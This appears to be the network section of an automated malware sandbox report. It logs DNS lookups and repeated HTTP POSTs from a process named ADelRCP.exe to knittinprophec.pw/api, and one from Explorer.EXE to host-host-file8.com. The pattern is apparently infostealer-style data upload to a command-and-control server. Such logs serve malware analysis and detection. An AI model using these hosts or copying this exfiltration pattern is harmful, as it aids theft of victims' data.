Set-Cookie: PHPSESSID=dkcoc6038upp0hbmlbcldljd3l; expires=Tue, 12 Mar 2024 09:53:56 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:17 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d2B6UBKrarm3iwSW%2BbuWq5a6p0vzSVXsEPwegUz9NclYLq8PyzOpj13s%2BgI02%2BXogeQZPTCrfwDZsVBuN0gDlCe1xttaZTFC2z5LLXAF9aqLPyNp8IEe%2FMaq2CZt9W7g693Jpg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939ca984b0bc8-AMS
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

95.214.26.28
POST

http://host-host-file8.com/

Explorer.EXE

Remote address:

95.214.26.28:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fdjum.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 215
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Fri, 17 Nov 2023 16:07:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=g3tp2kmuu2ij9pdek21o3v4jue; expires=Tue, 12 Mar 2024 09:53:56 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:17 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qy%2BcJ5ZCM9k8PyDWNr2CvEUEOti8mOsR0sDU8pJ41nmofXDp3T9YPSxch6j7DQfuNkhH58ZDnc13kFh7PV%2B47mORdUvmoO95rGt0w%2B5%2B9uE8%2FVRteouMvM5AYI0F8bnKOmK4GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939cebf8166ed-AMS
DNS

28.26.214.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.26.214.95.in-addr.arpa

IN PTR

Response
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=vir6gcnb4jm3r0dg0q5gm6o2rt; expires=Tue, 12 Mar 2024 09:53:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vMed6E2a77ZXk4JG9mTLZnkx42XoRrerQnKqs8vYaeLqbANCEIFhIsJ%2FXFBmy18iaOjGz5peQz%2By2zd5JvlCJ1OgPtlFdlMycZi8AIyAiNCzJB2ShKUXVZbbyFLeoiPLe8JMkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939d1b839663e-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=91vs59sk3a92kbp4g8nmobims5; expires=Tue, 12 Mar 2024 09:53:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IS4Unovx0CL9CjMU8gb%2FxGP4%2B2tqfpRt%2B3HoSAjEhbjwcr9zFsKhKr9SM55dFzfRtYirG3Mc1CopknxFevLY36EahXXno5QrDAyzXQ7Si82Z7USm9lpfNEE18XtcFfKt7JXByw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939d56bf11ca7-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=sktppqdq7l28drhhca7s3lc162; expires=Tue, 12 Mar 2024 09:53:58 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:19 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HJ6nGbldvsozXEkeO5GUVlhHZWuPex6I8CFYZqPEN7dLdT5SrEZ8Hi%2Bw2lDiwGseV4f1kSg4pQqbdeZZHX8TzHgvF%2BWR7xDaTFGFg7YpJbvGsBNbC%2FUaCGvYXs0rS4MzBq45uw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939d9ed5fb731-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 13153
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5l5tcdjhvstekhluhf3tvt0vjb; expires=Tue, 12 Mar 2024 09:53:59 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:20 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RtwP5X0yRwe6pmaEn0u7lvEl2CbI4NKDSPQySk3u5pW5CUocOur%2BbfL2EFw7og1yj%2BZvNZvsRB5rtQG%2FFdFvwHLW5VVhWs5%2F2ID88Ik7fSeLE2QoEdFJfeRmz0VZ7OXfnalNnw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939e18ec50b75-AMS
POST

http://knittinprophec.pw/api

ADelRCP.exe

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5em3b032dopjr5evutfsehen73; expires=Tue, 12 Mar 2024 09:54:00 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:21 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UAOpHrNr%2BB8TV5RL321Wgp%2FUwn6xGxbGVt22vZwuZuEhCdtKt7D%2Fz2o6Ezlojt2NeWoTWtaHKhAMeSwGJyf%2B5937DZ6WfU2TpoeHEEieF2I5uNs%2BWZ7JVrx4b8bq1wrlCLtQ8A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939e54b29b8b4-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=lgo9abqden5q2p6t70gsi8vn7b; expires=Tue, 12 Mar 2024 09:54:00 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:21 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jg7o2UgpN4uyLFKYNCRzG6IeZUqglidOLiCqAtK7OrYS33yXCZ1J62ccWzJOAlkBR0uAhmHuw3HunbRwnUUrNbif8qEWMLKarDC49iR2MdMth0QXL8I%2Bs1F9ShJw9MIF%2BG8%2Biw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939e87d87671b-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=0o2fgclt1k2k7gto5uu4bj95da; expires=Tue, 12 Mar 2024 09:54:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxXgBCd%2FEXYdMfMs%2Bxbi1dszGVOz0lbdRFEjnNofxRTPddeR0RKpIFZZS9dJTP8UQ2JB6unTjoqIit4%2BbEA%2Fgl6QSOg3U3sXUqu5KA11ycrTqkwBs7WJrlkg7YSWSw8tcZH3Eg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939ebba80b915-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=kg7jts21c91phphupdl7mcshde; expires=Tue, 12 Mar 2024 09:54:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2Mrf%2F3aBvGp2iIb2q5ZTmkL7kt3BBLfZup5HfO6pCW%2BFyvrAtnk%2BTZiNkEzMfRz0%2FzgUYER4jlTnBAy0dqLQ7Z1QyPpg3uUefoKcA5LSp5D0y8WCi%2Fw1KGk%2B0iestSb9j6ljSw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939eefe1d0b40-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=00gg0va4fpjllu8pau1odhf16f; expires=Tue, 12 Mar 2024 09:54:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F0Pm8KBwJjB8IrQ1vsrWKVfGuYjTIgrB3aNbtTVve%2B%2FRAILFQeyzDxBcviS%2FmgQGjh6lSrnO%2BC68ODTZa7Ks9fo4ObQExHBJygwv2ksHR0sMvmnAyJs9YeuLubJnqTProezuoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939f40dbbb89c-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17798
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8enhpuq52rempb50bhi8qsc51j; expires=Tue, 12 Mar 2024 09:54:03 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:24 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MI8HmR3YMHaa%2FbtftOdCsgINPe%2BWQ6Mws9ohVn54eEcMJdyDj9tPidwrZy%2BdIDmfGtmEk%2ByLZWMUQjRi4JxoYcDzUYP52v9d9NDBouOeKUMwX4u%2BkpD0uHDX7ekqbW%2BI7ly1jg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 827939f92fd7672a-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ceouu6un4oprhbntv2evusa9mj; expires=Tue, 12 Mar 2024 09:54:08 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:29 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BKBfFM745jIW9Ffq4PUVmRJJzkR7FnwWqv86s7rgNjblpAp2uVgf9qQkfMJGZFpx8DeP3Fa76VBF7lcw6rKrQgE9QbojqoLAKnGdS4lonvsSwx%2FV35jwzWDjqRyxcdcMCxMLYw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a1818750b8e-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ochae9lcjo9i845m6sblh006f6; expires=Tue, 12 Mar 2024 09:54:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zf8f9qS0EEavm%2FHnPtMRGilD330V8uk3O1AxDLxV7ljHTiH%2BwNOR4d6u%2BdpvcZFTA8suSu3kQQR2QvQmM1n3KCgWRakd%2FMh0pkgFXR5h4V3R8IZtuYHMvDyKazyGXBhHFVv6hw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a1c79af286b-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5rsm6euvcbp26gk3b7ubs6f67a; expires=Tue, 12 Mar 2024 09:54:09 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:30 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kuIdWNr%2F2lyRQg8ZpXzel%2FrRo2%2BqBxJ0a0tAXIZOXFmYDMtOc8VDvmdFzVwNuixBL4eRRH92PxUvSx8YJgoTK7a4Vw%2FNceCdHL%2FV23kMPJpwdC5lcJZHoPwcUsNCPyGVlHeOWg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a200a926640-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: knittinprophec.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:07:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ptrv1cp5qj5ojcvfhf7r90b1er; expires=Tue, 12 Mar 2024 09:54:10 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:07:31 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HZKfeNfr6yAPXbJprQ%2BR0Asn%2FgERfPnj%2F5RCElbYX6xrEetsehC5ks4CuY%2FuDeh6ZLtu0AhMjqWOFzYbmPjg042ZahG48dVU5YUySnkrWXHLI6hOuoqOwB3u%2BG72cbKwn1aFdA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793a23894a665e-AMS
POST

http://knittinprophec.pw/api

Remote address:

172.67.207.245:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
